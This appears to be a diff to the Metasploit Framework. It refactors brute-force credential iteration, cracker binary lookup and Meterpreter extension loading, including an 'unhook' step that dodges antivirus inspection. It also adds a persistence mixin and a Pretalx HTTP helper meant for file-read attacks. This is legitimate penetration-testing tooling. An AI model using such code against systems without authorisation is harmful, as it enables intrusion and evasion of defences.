+        File.open(user_file, 'r:binary') do |user_fd|
          user_fd.each_line do |user_from_file|
            user_from_file.chomp!
-            yield Metasploit::Framework::Credential.new(public: add_public, private: user_from_file, realm: realm, private_type: private_type(user_from_file))
+            yield user_from_file
          end
          user_fd.seek(0)
        end
-        additional_privates.each do |add_private|
-          yield Metasploit::Framework::Credential.new(public: add_public, private: add_private, realm: realm, private_type: private_type(add_private))
-        end
      end
-    ensure
-      user_fd.close if user_fd && !user_fd.closed?
+
+      additional_publics.each do |add_public|
+        yield add_public
+      end
    end

    # When password spraying is not enabled, do first usernames then passwords
@@ -418,38 +356,9 @@ module Metasploit::Framework
    # @yieldparam credential [Metasploit::Framework::Credential]
    # @return [void]
    def each_unfiltered_username_first
-      if pass_file.present?
-        pass_fd = File.open(pass_file, 'r:binary')
-      end
-
-      prepended_creds.each { |c| yield c }
-
-      if anonymous_login
-        yield Metasploit::Framework::Credential.new(public: '', private: '', realm: realm, private_type: :password)
-      end
-
      if username.present?
-        if nil_passwords
-          yield Metasploit::Framework::Credential.new(public: username, private: nil, realm: realm, private_type: :password)
-        end
-        if password.present?
-          yield Metasploit::Framework::Credential.new(public: username, private: password, realm: realm, private_type: private_type(password))
-        end
-        if user_as_pass
-          yield Metasploit::Framework::Credential.new(public: username, private: username, realm: realm, private_type: :password)
-        end
-        if blank_passwords
-          yield Metasploit::Framework::Credential.new(public: username, private: "", realm: realm, private_type: :password)
-        end
-        if pass_fd
-          pass_fd.each_line do |pass_from_file|
-            pass_from_file.chomp!
-            yield Metasploit::Framework::Credential.new(public: username, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
-          end
-          pass_fd.seek(0)
-        end
-        additional_privates.each do |add_private|
-          yield Metasploit::Framework::Credential.new(public: username, private: add_private, realm: realm, private_type: private_type(add_private))
+        each_password(username) do |password, private_type|
+          yield Metasploit::Framework::Credential.new(public: username, private: password, realm: realm, private_type: private_type)
        end
      end

@@ -457,69 +366,69 @@ module Metasploit::Framework
        File.open(user_file, 'r:binary') do |user_fd|
          user_fd.each_line do |user_from_file|
            user_from_file.chomp!
-            if nil_passwords
-              yield Metasploit::Framework::Credential.new(public: user_from_file, private: nil, realm: realm, private_type: :password)
-            end
-            if password.present?
-              yield Metasploit::Framework::Credential.new(public: user_from_file, private: password, realm: realm, private_type: private_type(password) )
-            end
-            if user_as_pass
-              yield Metasploit::Framework::Credential.new(public: user_from_file, private: user_from_file, realm: realm, private_type: :password)
-            end
-            if blank_passwords
-              yield Metasploit::Framework::Credential.new(public: user_from_file, private: "", realm: realm, private_type: :password)
-            end
-            if pass_fd
-              pass_fd.each_line do |pass_from_file|
-                pass_from_file.chomp!
-                yield Metasploit::Framework::Credential.new(public: user_from_file, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
-              end
-              pass_fd.seek(0)
-            end
-            additional_privates.each do |add_private|
-              yield Metasploit::Framework::Credential.new(public: user_from_file, private: add_private, realm: realm, private_type: private_type(add_private))
+            each_password(user_from_file) do |password, private_type|
+              yield Metasploit::Framework::Credential.new(public: user_from_file, private: password, realm: realm, private_type: private_type)
            end
          end
        end
      end

-      if userpass_file.present?
-        File.open(userpass_file, 'r:binary') do |userpass_fd|
-          userpass_fd.each_line do |line|
-            user, pass = line.split(" ", 2)
-            if pass.blank?
-              pass = ''
-            else
-              pass.chomp!
-            end
-            yield Metasploit::Framework::Credential.new(public: user, private: pass, realm: realm)
-          end
-        end
+      each_user_pass_from_userpass_file do |user, pass|
+        yield Metasploit::Framework::Credential.new(public: user, private: pass, realm: realm)
      end

      additional_publics.each do |add_public|
-        if password.present?
-          yield Metasploit::Framework::Credential.new(public: add_public, private: password, realm: realm, private_type: private_type(password) )
+        each_password(add_public) do |password, private_type|
+          yield Metasploit::Framework::Credential.new(public: add_public, private: password, realm: realm, private_type: private_type)
        end
-        if user_as_pass
-          yield Metasploit::Framework::Credential.new(public: add_public, private: user_from_file, realm: realm, private_type: :password)
-        end
-        if blank_passwords
-          yield Metasploit::Framework::Credential.new(public: add_public, private: "", realm: realm, private_type: :password)
-        end
-        if pass_fd
+      end
+    end
+
+    # Iterates over all possible passwords
+    def each_password(user)
+      if nil_passwords
+        yield [nil, :password]
+      end
+
+      if password.present?
+        yield [password, private_type(password)]
+      end
+
+      if user_as_pass
+        yield [user, :password]
+      end
+
+      if blank_passwords
+        yield ["", :password]
+      end
+
+      if pass_file
+        File.open(pass_file, 'r:binary') do |pass_fd|
          pass_fd.each_line do |pass_from_file|
            pass_from_file.chomp!
-            yield Metasploit::Framework::Credential.new(public: add_public, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
+            yield [pass_from_file, private_type(pass_from_file)]
          end
          pass_fd.seek(0)
        end
-        additional_privates.each do |add_private|
-          yield Metasploit::Framework::Credential.new(public: add_public, private: add_private, realm: realm, private_type: private_type(add_private))
+      end
+
+      additional_privates.each do |add_private|
+        yield [add_private, private_type(add_private)]
+      end
+    end
+
+    # Iterates on userpass file if present
+    def each_user_pass_from_userpass_file
+      return unless userpass_file.present?
+
+      File.open(userpass_file, 'r:binary') do |userpass_fd|
+        userpass_fd.each_line do |line|
+          user, pass = line.split(" ", 2)
+          pass = pass.blank? ? '' : pass.chomp!
+
+          yield [user, pass]
        end
      end
-    ensure
-      pass_fd.close if pass_fd && !pass_fd.closed?
    end

    # Returns true when #each will have no results to iterate
@@ -533,14 +442,14 @@ module Metasploit::Framework
    #
    # @return [Boolean]
    def has_users?
-      username.present? || user_file.present? || userpass_file.present? || !additional_publics.empty? || !!ignore_public
+      username.present? || user_file.present? || userpass_file.present? || !additional_publics.empty?
    end

    # Returns true when there are any private values set
    #
    # @return [Boolean]
    def has_privates?
-      super || userpass_file.present? || user_as_pass || !!ignore_private
+      super || userpass_file.present? || user_as_pass
    end

  end
@@ -111,20 +111,11 @@ module Metasploit

        def ldap_auth_opts_schannel(opts, ssl)
          auth_opts = {}
-          pfx_path = opts[:ldap_cert_file]
          raise Msf::ValidationError, 'The SSL option must be enabled when using Schannel authentication.' unless ssl
          raise Msf::ValidationError, 'Can not sign and seal when using Schannel authentication.' if opts.fetch(:sign_and_seal, false)

-          if pfx_path.present?
-            unless ::File.file?(pfx_path) && ::File.readable?(pfx_path)
-              raise Msf::ValidationError, 'Failed to load the PFX certificate file. The path was not a readable file.'
-            end
-
-            begin
-              pkcs = OpenSSL::PKCS12.new(File.binread(pfx_path), '')
-            rescue StandardError => e
-              raise Msf::ValidationError, "Failed to load the PFX file (#{e})"
-            end
+          if opts[:ldap_pkcs12].present?
+            pkcs = opts[:ldap_pkcs12][:value]
          else
            pkcs12_storage = Msf::Exploit::Remote::Pkcs12::Storage.new(
              framework: opts[:framework],
@@ -119,6 +119,10 @@ module Metasploit
            public_send("#{attribute}=", value)
          end
        end
+        
+        def get_type
+          self.cracker
+        end

        # This method takes a {framework.db.cred.private.jtr_format} (string), and
        # returns the string number associated to the hashcat format
@@ -300,22 +304,19 @@ module Metasploit
          if cracker_path && ::File.file?(cracker_path)
            return cracker_path
          else
-            # Look in the Environment PATH for the john binary
-            if cracker == 'john'
-              path = Rex::FileUtils.find_full_path('john') ||
-                     Rex::FileUtils.find_full_path('john.exe')
-            elsif cracker == 'hashcat'
-              path = Rex::FileUtils.find_full_path('hashcat') ||
-                     Rex::FileUtils.find_full_path('hashcat.exe')
+            case cracker
+            when 'hashcat'
+              path = get_hashcat
+            when 'john'
+              path = get_john
+            when 'auto'
+              path = get_john || get_hashcat
            else
-              raise PasswordCrackerNotFoundError, 'No suitable Cracker was selected, so a binary could not be found on the system'
+              raise PasswordCrackerNotFoundError, 'No suitable Cracker was selected, so a binary could not be found on the system JOHN || HASHCAT'
            end
+            raise PasswordCrackerNotFoundError, 'No suitable john/hashcat binary was found on the system' unless path && ::File.file?(path)

-            if path && ::File.file?(path)
-              return path
-            end
-
-            raise PasswordCrackerNotFoundError, 'No suitable john/hashcat binary was found on the system'
+            return path
          end
        end

@@ -575,6 +576,20 @@ module Metasploit
          end
          cmd << hash_path
        end
+        
+        def get_hashcat
+          # Look in the Environment PATH for the hashcat binary
+          self.cracker = 'hashcat'
+          Rex::FileUtils.find_full_path('hashcat') ||
+            Rex::FileUtils.find_full_path('hashcat.exe')
+        end
+
+        def get_john
+          self.cracker = 'john'
+          # Look in the Environment PATH for the john binary
+          Rex::FileUtils.find_full_path('john') ||
+            Rex::FileUtils.find_full_path('john.exe')
+        end

      end
    end
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.4.78"
+      VERSION = "6.4.87"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -581,7 +581,13 @@ class ReadableText

    option_tables = []

-    options_grouped_by_conditions.sort.each do |conditions, options|
+    sort_by_empty_then_lexicographical = proc do |(conditions_a, _options_a), (conditions_b, _options_b)|
+      next -1 if conditions_a.empty?
+      next 1 if conditions_b.empty?
+      conditions_a.to_s <=> conditions_b.to_s
+    end
+
+    options_grouped_by_conditions.sort(&sort_by_empty_then_lexicographical).each do |conditions, options|
      tbl = options_table(missing, mod, options, indent)

      next if tbl.rows.empty?
@@ -180,32 +180,30 @@ class Meterpreter < Rex::Post::Meterpreter::Client
      print_warning('Meterpreter start up operations have been aborted. Use the session at your own risk.')
      return nil
    end
-    # Unhook the process prior to loading stdapi to reduce logging/inspection by any AV/PSP
-    if datastore['AutoUnhookProcess'] == true
-      console.run_single('load unhook')
-      console.run_single('unhook_pe')
-    end
-
-    unless datastore['AutoLoadStdapi'] == false
-
-      session.load_stdapi
-
-      unless datastore['AutoSystemInfo'] == false
-        session.load_session_info
-      end
-
-      # only load priv on native windows
-      # TODO: abstract this too, to remove windows stuff
-      if session.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(session.arch)
-        session.load_priv rescue nil
-      end
-    end
+    extensions = datastore['AutoLoadExtensions']&.delete(' ').split(',') || []

+    # BEGIN: This should be removed on MSF 7
+    # Unhook the process prior to loading stdapi to reduce logging/inspection by any AV/PSP (by default unhook is first, see meterpreter_options/windows.rb)
+    extensions.push('unhook') if datastore['AutoUnhookProcess'] && session.platform == 'windows'
+    extensions.push('stdapi') if datastore['AutoLoadStdapi']
+    extensions.push('priv') if datastore['AutoLoadStdapi'] && session.platform == 'windows'
+    extensions.push('android') if session.platform == 'android'
+    extensions = extensions.uniq
+    # END
+    original = console.disable_output
+    console.disable_output = true
    # TODO: abstract this a little, perhaps a "post load" function that removes
    # platform-specific stuff?
-    if session.platform == 'android'
-      session.load_android
+    extensions.each do |extension|
+      begin
+        console.run_single("load #{extension}")
+        console.run_single('unhook_pe') if extension == 'unhook'
+        session.load_session_info if extension == 'stdapi' && datastore['AutoSystemInfo']
+      rescue => e
+        print_warning("Failed loading extension #{extension}")
+      end
    end
+    console.disable_output = original

    ['InitialAutoRunScript', 'AutoRunScript'].each do |key|
      unless datastore[key].nil? || datastore[key].empty?
@@ -0,0 +1,27 @@
+# -*- coding: binary -*-
+
+require 'shellwords'
+
+module Msf
+  module Sessions
+    #
+    # Defines common options across all Meterpreter implementations
+    #
+    module MeterpreterOptions::Android
+      include Msf::Sessions::MeterpreterOptions::Common
+      def initialize(info = {})
+        super(info)
+
+        register_advanced_options(
+          [
+            OptString.new(
+              'AutoLoadExtensions',
+              [true, "Automatically load extensions on bootstrap, comma separated.", 'stdapi,android']
+            ),
+          ],
+          self.class
+        )
+      end
+    end
+  end
+end
@@ -0,0 +1,31 @@
+# -*- coding: binary -*-
+
+require 'shellwords'
+
+module Msf
+  module Sessions
+    #
+    # Defines common options across all Meterpreter implementations
+    #
+    module MeterpreterOptions::AppleIos
+      include Msf::Sessions::MeterpreterOptions::Common
+      def initialize(info = {})
+        super(info)
+
+        register_advanced_options(
+          [
+            OptString.new(
+              'AutoLoadExtensions',
+              [true, "Automatically load extensions on bootstrap, comma separated.", 'stdapi']
+            ),
+            OptString.new(
+              'PayloadProcessCommandLine',
+              [ false, 'The displayed command line that will be used by the payload', '']
+            ),
+          ],
+          self.class
+        )
+      end
+    end
+  end
+end
@@ -0,0 +1,27 @@
+# -*- coding: binary -*-
+
+require 'shellwords'
+
+module Msf
+  module Sessions
+    #
+    # Defines common options across all Meterpreter implementations
+    #
+    module MeterpreterOptions::Bsd
+      include Msf::Sessions::MeterpreterOptions::Common
+      def initialize(info = {})
+        super(info)
+
+        register_advanced_options(
+          [
+            OptString.new(
+              'AutoLoadExtensions',
+              [true, "Automatically load extensions on bootstrap, comma separated.", 'stdapi']
+            ),
+          ],
+          self.class
+        )
+      end
+    end
+  end
+end
@@ -7,7 +7,7 @@ module Msf
    #
    # Defines common options across all Meterpreter implementations
    #
-    module MeterpreterOptions
+    module MeterpreterOptions::Common

      TIMEOUT_SESSION = 24 * 3600 * 7  # 1 week
      TIMEOUT_COMMS = 300              # 5 minutes
@@ -63,14 +63,6 @@ module Msf
              'SessionCommunicationTimeout',
              [ false, 'The number of seconds of no activity before this session should be killed', TIMEOUT_COMMS]
            ),
-            OptString.new(
-              'PayloadProcessCommandLine',
-              [ false, 'The displayed command line that will be used by the payload', '']
-            ),
-            OptBool.new(
-              'AutoUnhookProcess',
-              [true, "Automatically load the unhook extension and unhook the process", false]
-            ),
            OptBool.new(
              'MeterpreterDebugBuild',
              [false, 'Use a debug version of Meterpreter']
@@ -0,0 +1,27 @@
+# -*- coding: binary -*-
+
+require 'shellwords'
+
+module Msf
+  module Sessions
+    #
+    # Defines common options across all Meterpreter implementations
+    #
+    module MeterpreterOptions::Java
+      include Msf::Sessions::MeterpreterOptions::Common
+      def initialize(info = {})
+        super(info)
+
+        register_advanced_options(
+          [
+            OptString.new(
+              'AutoLoadExtensions',
+              [true, "Automatically load extensions on bootstrap, comma separated.", 'stdapi']
+            ),
+          ],
+          self.class
+        )
+      end
+    end
+  end
+end
@@ -0,0 +1,31 @@
+# -*- coding: binary -*-
+
+require 'shellwords'
+
+module Msf
+  module Sessions
+    #
+    # Defines common options across all Meterpreter implementations
+    #
+    module MeterpreterOptions::Linux
+      include Msf::Sessions::MeterpreterOptions::Common
+      def initialize(info = {})
+        super(info)
+
+        register_advanced_options(
+          [
+            OptString.new(
+              'AutoLoadExtensions',
+              [true, "Automatically load extensions on bootstrap, comma separated.", 'stdapi']
+            ),
+            OptString.new(
+              'PayloadProcessCommandLine',
+              [ false, 'The displayed command line that will be used by the payload', '']
+            ),
+          ],
+          self.class
+        )
+      end
+    end
+  end
+end
@@ -0,0 +1,31 @@
+# -*- coding: binary -*-
+
+require 'shellwords'
+
+module Msf
+  module Sessions
+    #
+    # Defines common options across all Meterpreter implementations
+    #
+    module MeterpreterOptions::OSX
+      include Msf::Sessions::MeterpreterOptions::Common
+      def initialize(info = {})
+        super(info)
+
+        register_advanced_options(
+          [
+            OptString.new(
+              'AutoLoadExtensions',
+              [true, 'Automatically load extensions on bootstrap, comma separated.', 'stdapi']
+            ),
+            OptString.new(
+              'PayloadProcessCommandLine',
+              [ false, 'The displayed command line that will be used by the payload', '']
+            ),
+          ],
+          self.class
+        )
+      end
+    end
+  end
+end
@@ -0,0 +1,27 @@
+# -*- coding: binary -*-
+
+require 'shellwords'
+
+module Msf
+  module Sessions
+    #
+    # Defines common options across all Meterpreter implementations
+    #
+    module MeterpreterOptions::Php
+      include Msf::Sessions::MeterpreterOptions::Common
+      def initialize(info = {})
+        super(info)
+
+        register_advanced_options(
+          [
+            OptString.new(
+              'AutoLoadExtensions',
+              [true, "Automatically load extensions on bootstrap, comma separated.", 'stdapi']
+            ),
+          ],
+          self.class
+        )
+      end
+    end
+  end
+end
@@ -0,0 +1,27 @@
+# -*- coding: binary -*-
+
+require 'shellwords'
+
+module Msf
+  module Sessions
+    #
+    # Defines common options across all Meterpreter implementations
+    #
+    module MeterpreterOptions::Python
+      include Msf::Sessions::MeterpreterOptions::Common
+      def initialize(info = {})
+        super(info)
+
+        register_advanced_options(
+          [
+            OptString.new(
+              'AutoLoadExtensions',
+              [true, "Automatically load extensions on bootstrap, comma separated.", 'stdapi']
+            ),
+          ],
+          self.class
+        )
+      end
+    end
+  end
+end
@@ -0,0 +1,31 @@
+# -*- coding: binary -*-
+
+require 'shellwords'
+
+module Msf
+  module Sessions
+    #
+    # Defines common options across all Meterpreter implementations
+    #
+    module MeterpreterOptions::Windows
+      include Msf::Sessions::MeterpreterOptions::Common
+      def initialize(info = {})
+        super(info)
+
+        register_advanced_options(
+          [
+            OptString.new(
+              'AutoLoadExtensions',
+              [true, "Automatically load extensions on bootstrap, comma separated.", 'unhook,priv,stdapi']
+            ),
+            OptBool.new(
+              'AutoUnhookProcess',
+              [true, "Automatically load the unhook extension and unhook the process", false]
+            ),
+          ],
+          self.class
+        )
+      end
+    end
+  end
+end
@@ -71,11 +71,25 @@ module Msf
      def create_credential_login(credential_data)
        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins'] && @report

-        @report[rhost] = { successful_logins: [] }
+        @report[rhost] ||= {}
+        @report[rhost][:successful_logins] ||= []
        @report[rhost][:successful_logins] << login_credentials(credential_data)
        super
      end

+      def report_successful_login(public:, private:)
+        return unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins'] && @report
+
+        @report[rhost] ||= {}
+        @report[rhost][:successful_logins] ||= []
+        @report[rhost][:successful_logins] << {
+          public: public,
+          private_data: private
+        }
+
+        nil
+      end
+
      # Creates a credential and adds to to the DB if one is present, then calls create_credential_login to
      # attempt a login
      #
@@ -90,7 +104,8 @@ module Msf
      def create_credential_and_login(credential_data)
        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins'] && @report

-        @report[rhost] = { successful_logins: [] }
+        @report[rhost] ||= {}
+        @report[rhost][:successful_logins] ||= []
        @report[rhost][:successful_logins] << login_credentials(credential_data)
        super
      end
@@ -107,14 +122,9 @@ module Msf
      def start_session(obj, info, ds_merge, crlf = false, sock = nil, sess = nil)
        return super unless framework.features.enabled?(Msf::FeatureManager::SHOW_SUCCESSFUL_LOGINS) && datastore['ShowSuccessfulLogins']

-        unless @report && @report[rhost]
-          elog("No RHOST found in report, skipping reporting for #{rhost}")
-          print_brute level: :error, ip: rhost, msg: "No RHOST found in report, skipping reporting for #{rhost}"
-          return super
-        end
-
        result = super
-        @report[rhost].merge!({ successful_sessions: [] })
+        @report[rhost] ||= {}
+        @report[rhost][:successful_sessions] ||= []
        @report[rhost][:successful_sessions] << result
        result
      end
@@ -127,6 +137,7 @@ module Msf
      #
      # @return [Hash] Rhost keys mapped to successful logins and sessions for each host
      def print_report_summary
+        return unless @report
        report = @report

        logins = report.flat_map { |_k, v| v[:successful_logins] }.compact
@@ -247,6 +247,7 @@ module DbConnector
      targ,name = dest.split('/')
      (name = targ and targ = nil) if not name
      res[:host],res[:port] = targ.split(':') if targ
+      name = name&.split('?')&.first
    end
    res[:name] = name || 'metasploit3'
    res
@@ -21,7 +21,6 @@ module Exploit::EXE
        OptPath.new('EXE::Path',     [false, 'The directory in which to look for the executable template']),
        OptPath.new('EXE::Template', [false, 'The executable template file name.']),
        OptBool.new('EXE::Inject',   [false, 'Set to preserve the original EXE function']),
-        OptBool.new('EXE::OldMethod',[false, 'Set to use the substitution EXE generation method.']),
        OptBool.new('EXE::FallBack', [false, 'Use the default template in case the specified one is missing']),
        OptBool.new('MSI::EICAR',    [false, 'Generate an EICAR file instead of regular payload msi']),
        OptPath.new('MSI::Custom',   [false, 'Use custom msi instead of automatically generating a payload msi']),
@@ -185,7 +184,7 @@ protected
        :template => datastore['EXE::Template'],
        :inject => datastore['EXE::Inject'],
        :fallback => datastore['EXE::FallBack'],
-        :sub_method => datastore['EXE::OldMethod']
+        :sub_method => false
      })

    # NOTE: If code and platform/arch are supplied, we use those values and skip initialization.
@@ -0,0 +1,91 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Local::Persistence
+    def initialize(info = {})
+      @persistence_service = Rex::Sync::Event.new(auto_reset = false)
+      @clean_up_rc = ''
+      super(
+        update_info(
+          info,
+          'DefaultOptions' => {},
+          # https://github.com/rapid7/metasploit-framework/pull/19676#discussion_r1907594308
+          'Stance' => Msf::Exploit::Stance::Passive,
+          'Passive' => true
+        )
+      )
+
+      register_advanced_options(
+        [
+          OptString.new('WritableDir', [true, 'A directory where we can write files', '']),
+          OptBool.new('CleanUpRc', [true, 'Create a cleanup resource file.', true])
+        ]
+      )
+    end
+
+    def exploit
+      run_as_background = !datastore['DisablePayloadHandler']
+      print_warning('Payload handler is disabled, the persistence will be installed only.') unless run_as_background
+
+      # Call the install_persistence function
+      # must be declared inside the persistence module
+      install_persistence
+
+      save_cleanup_rc if datastore['CleanUpRc'] && !@clean_up_rc.empty?
+
+      @persistence_service.wait if run_as_background
+    end
+
+    def writable_dir
+      # base the WritableDir default off of the persistence module path to avoid
+      # needing to probe the target directly, or deal with one offs like ssh sessions
+      return datastore['WritableDir'] unless datastore['WritableDir'].empty?
+
+      mod_path = self.class.file_path.downcase.tr('\\', '/')
+
+      if mod_path.include?('/windows/')
+        '%TEMP%'
+      elsif mod_path.include?('/multi/')
+        print_warning('Please set the WritableDir datastore option or the module is likely to fail')
+        ''
+      else
+        '/tmp/'
+      end
+    end
+
+    def install_persistence
+      # to be overloaded by the module
+    end
+
+    def save_cleanup_rc
+      host = session.sys.config.sysinfo['Computer']
+      # Create Filename info to be appended to downloaded files
+      filenameinfo = '_' + ::Time.now.strftime('%Y%m%d.%M%S')
+      logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo))
+      # Create the log directory
+      ::FileUtils.mkdir_p(logs)
+
+      # logfile name
+      clean_rc = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + '.rc'
+      file_local_write(clean_rc, @clean_up_rc)
+
+      print_status("Meterpreter-compatible Cleanup RC file: #{clean_rc}")
+
+      report_note(host: host,
+                  type: 'host.persistance.cleanup',
+                  data: {
+                    local_id: session.sid,
+                    stype: session.type,
+                    desc: session.info,
+                    platform: session.platform,
+                    via_payload: session.via_payload,
+                    via_exploit: session.via_exploit,
+                    created_at: Time.now.utc,
+                    commands: @clean_up_rc
+                  })
+    end
+
+    def cleanup
+    end
+  end
+end
@@ -0,0 +1,28 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Local::Timespec
+    TIMESPEC_REGEX = %r{
+    \b(
+      (?:[01]?\d|2[0-3]):[0-5]\d(?:\s?(?:AM|PM))? |            # Matches HH:MM (12h/24h)
+      midnight | noon | teatime | now |                        # Matches special keywords
+      now\s?\+\s?\d+\s?(?:minutes?|hours?|days?|weeks?) |      # Matches relative times
+      (?:mon|tue|wed|thu|fri|sat|sun)(?:day)? |                # Matches named days
+      (?:next|last)\s(?:mon|tue|wed|thu|fri|sat|sun)(?:day)? | # Matches next/last weekday
+      \d{1,2}/\d{1,2}/\d{2,4} |                                # Matches MM/DD/YY(YY)
+      \d{1,2}\.\d{1,2}\.\d{2,4} |                              # Matches DD.MM.YY(YY)
+      \d{6} | \d{8}                                            # Matches MMDDYY or MMDDYYYY
+    )\b
+  }xi # 'x' allows extended mode, 'i' makes it case-insensitive
+
+    #
+    # Attempts to validate a timespec.
+    #
+    # @param timespec [String] The timespec to test
+    # @return [Boolean] If the timespec is valid or not
+    #
+    def self.valid_timespec?(timespec)
+      !!(timespec =~ TIMESPEC_REGEX) # Ensures true/false return
+    end
+  end
+end
@@ -0,0 +1,482 @@
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        module Pretalx
+          include Msf::Exploit::Remote::HttpClient
+          include Msf::Exploit::Remote::HTTP::Pretalx::Error
+
+          def initialize(info = {})
+            super
+            register_options([
+              OptString.new('CONFERENCE_NAME', [true, 'Name of conference on behalf which file read will be performed']),
+            ])
+          end
+
+          def debug?
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri('orga', 'admin/')
+            })
+
+            raise DebugError unless res&.code == 200
+            res.body&.include?('running in development mode')
+          end
+
+          def get_version
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri('orga', 'event/'),
+              'keep_cookies' => true
+            })
+
+            raise VersionCheckError unless res&.code == 200
+
+            html = res.get_html_document
+            version_element = html.at('span//a')&.text
+            return Rex::Version.new(version_element)
+          end
+
+          def login(user_email, user_password)
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri('orga', 'login/'),
+              'keep_cookies' => true
+            })
+            
+            raise UnexpectedResponseError unless res&.code == 200
+
+            csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')
+
+            raise CsrfError unless csrf_token
+
+            res = send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri('orga', 'login/'),
+              'vars_post' => { 'csrfmiddlewaretoken' => csrf_token, 'login_email' => user_email, 'login_password' => user_password },
+              'keep_cookies' => true
+            })
+
+            raise SessionCookieError unless res.get_cookies =~ /pretalx_csrftoken=([a-zA-Z0-9]+);/
+
+            @pretalx_token = Regexp.last_match(1)
+
+            res&.code == 302
+          end
+
+          def get_registration_step(uri)
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri(uri),
+              'keep_cookies' => true
+            })
+
+            fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to fetch registration step') unless res&.code == 200
+            res
+          end
+
+          def create_general_info(submit_uri, proposal_name, abstract, description, notes, image, additional_speaker)
+            res = get_registration_step(submit_uri)
+
+            csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')
+            submission_type = res.get_hidden_inputs.dig(0, 'submission_type')
+
+            fail_with(Msf::Module::Failure::Unknown, 'Could not find hidden inputs: creating general info') unless submit_uri && csrf_token
+            data_post = Rex::MIME::Message.new
+
+            data_post.add_part(csrf_token, '', '', %(form-data; name="csrfmiddlewaretoken"))
+            data_post.add_part(proposal_name, '', '', %(form-data; name="title"))
+            data_post.add_part(submission_type, '', '', %(form-data; name="submission_type"))
+            data_post.add_part('en', '', '', %(form-data; name="content_locale"))
+            data_post.add_part(abstract, '', '', %(form-data; name="abstract"))
+            data_post.add_part(description, '', '', %(form-data; name="description"))
+            data_post.add_part(notes, '', '', %(form-data; name="notes"))
+            data_post.add_part(image, 'application/octet-stream', '', %(form-data; name="image"; filename=""))
+            data_post.add_part(additional_speaker, '', '', %(form-data; name="additional_speaker"))
+
+            send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri(submit_uri),
+              'data' => data_post.to_s,
+              'ctype' => "multipart/form-data; boundary=#{data_post.bound}"
+            })
+          end
+
+          def create_account_info(submit_uri, login_email, login_password, register_name, register_email, register_password)
+            res = get_registration_step(submit_uri)
+
+            csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')
+
+            fail_with(Msf::Module::Failure::Unknown, 'Could not find hidden inputs: creating account info') unless submit_uri && csrf_token
+
+            data_post = Rex::MIME::Message.new
+            data_post.add_part(csrf_token, nil, nil, %(form-data; name="csrfmiddlewaretoken"))
+            data_post.add_part(csrf_token, nil, nil, %(form-data; name="csrfmiddlewaretoken"))
+            data_post.add_part(login_email, '', '', %(form-data; name="login_email"))
+            data_post.add_part(login_password, '', '', %(form-data; name="login_password"))
+            data_post.add_part(register_name, '', '', %(form-data; name="register_name"))
+            data_post.add_part(register_email, '', '', %(form-data; name="register_email"))
+            data_post.add_part(register_password, '', '', %(form-data; name="register_password"))
+            data_post.add_part(register_password, '', '', %(form-data; name="register_password_repeat"))
+
+            send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri(submit_uri),
+              'data' => data_post.to_s,
+              'ctype' => "multipart/form-data; boundary=#{data_post.bound}"
+            })
+          end
+
+          def create_profile_info(submit_uri)
+            res = get_registration_step(submit_uri)
+
+            csrf_token = res.get_hidden_inputs.dig(0, 'csrfmiddlewaretoken')
+
+            fail_with(Msf::Module::Failure::Unknown, 'Could not found hidden inputs: creating profile info') unless submit_uri && csrf_token
+
+            data_post = Rex::MIME::Message.new
+            data_post.add_part(csrf_token, '', '', %(form-data; name="csrfmiddlewaretoken"))
+            data_post.add_part('', 'application/octet-stream', '', %(form-data; name="avatar"; filename=""))
+            data_post.add_part(Rex::Text.rand_text_alphanumeric(10), '', '', %(form-data; name="name"))
+            data_post.add_part(Rex::Text.rand_text_alphanumeric(10), '', '', %(form-data; name="biography"))
+            data_post.add_part(%({"availabilities":[]}), '', '', %(form-data; name="availabilities"))
+
+            send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri(submit_uri),
+              'data' => data_post.to_s,
+              'ctype' => "multipart/form-data; boundary=#{data_post.bound}"
+            })
+          end
+
+          def register_proposal(proposal_info = {})
+            proposal_name = proposal_info[:proposal_name] || Rex::Text.rand_text_alphanumeric(10)
+            abstract = proposal_info[:abstract] || Rex::Text.rand_text_alphanumeric(10)
+            description = proposal_info[:description] || ''
+            notes = proposal_info[:notes] || ''
+            image = proposal_info[:image] || ''
+            additional_speaker = proposal_info[:additional_speaker] || ''
+            if proposal_info.fetch(:email, nil) && proposal_info.fetch(:password, nil)
+              login_email = proposal_info[:email]
+              login_password = proposal_info[:password]
+              register_name = ''
+              register_email = ''
+              register_password = ''
+            else
+              login_email = ''
+              login_password = ''
+              register_name = Rex::Text.rand_text_alphanumeric(10)
+              register_email = Rex::Text.rand_mail_address
+              register_password = Rex::Text.rand_text_alphanumeric(15)
+            end
+
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri(datastore['CONFERENCE_NAME'], 'submit/')
+            })
